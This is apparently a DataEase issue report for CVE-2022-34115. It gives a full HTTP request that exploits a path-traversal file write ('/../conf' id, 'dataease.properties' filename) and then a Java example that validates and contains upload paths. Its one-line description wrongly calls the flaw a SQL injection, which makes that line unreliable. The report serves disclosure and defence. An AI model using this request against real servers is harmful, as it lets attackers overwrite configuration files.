Headline
CVE-2022-34115: [Bug] Arbitrary cross-directory file write · Issue #2428 · dataease/dataease
Dataease v1.11.1 was discovered to contain a SQL injection vulnerability via the parameter dataSourceId.
POST /driver/file/upload HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
Content-Type: multipart/form-data; boundary=---------------------------70362338610608895491036095575
Content-Length: 1167
Origin: http://10.211.55.18
Connection: close
Referer: http://10.211.55.18/
Cookie:

-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="id"

/../conf
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="name"

123
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="createTime"

1654829420814
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="type"

mysql
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="driverClass"

null
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="desc"


-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="typeDesc"

MySQL
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="showModel"

show
-----------------------------70362338610608895491036095575
Content-Disposition: form-data; name="file"; filename="dataease.properties"
Content-Type: image/png

123
-----------------------------70362338610608895491036095575--
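
A containment check for the id and filename fields of the request above, as an added example that is not DataEase code. It assumes the server joins id into the upload directory path; the class name, method name and allow-list patterns are hypothetical.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

// Added example: hypothetical helper, not taken from the DataEase code base.
public class DriverUploadPaths {
    // Assumption: driver ids are opaque tokens, so a strict allow-list is acceptable.
    private static final Pattern SAFE_SEGMENT = Pattern.compile("[A-Za-z0-9_-]{1,64}");
    private static final Pattern SAFE_FILE = Pattern.compile("[A-Za-z0-9_.-]{1,128}");

    /** Resolves base/id/fileName and rejects anything that would leave base. */
    static Path resolveUpload(Path base, String id, String fileName) throws IOException {
        if (id == null || !SAFE_SEGMENT.matcher(id).matches()) {
            throw new IllegalArgumentException("invalid driver id");
        }
        if (fileName == null || fileName.startsWith(".")
                || !SAFE_FILE.matcher(fileName).matches()) {
            throw new IllegalArgumentException("invalid file name");
        }
        Path root = base.toRealPath(); // canonical form, symlinks resolved
        Path target = root.resolve(id).resolve(fileName).normalize();
        // Defence in depth: stay inside root even if the allow-lists are loosened later.
        if (!target.startsWith(root)) {
            throw new IllegalArgumentException("path escapes upload root");
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed stand-in for the driver upload root.
        Path base = Files.createTempDirectory("drivers");

        // Unchecked string concatenation with the id value from the request above.
        Path naive = Paths.get(base + "/" + "/../conf" + "/" + "dataease.properties").normalize();
        System.out.println("naive path stays inside root: " + naive.startsWith(base));

        // Constructed benign input.
        System.out.println("accepted: " + resolveUpload(base, "mysql-8", "connector.jar"));

        try {
            resolveUpload(base, "/../conf", "dataease.properties");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```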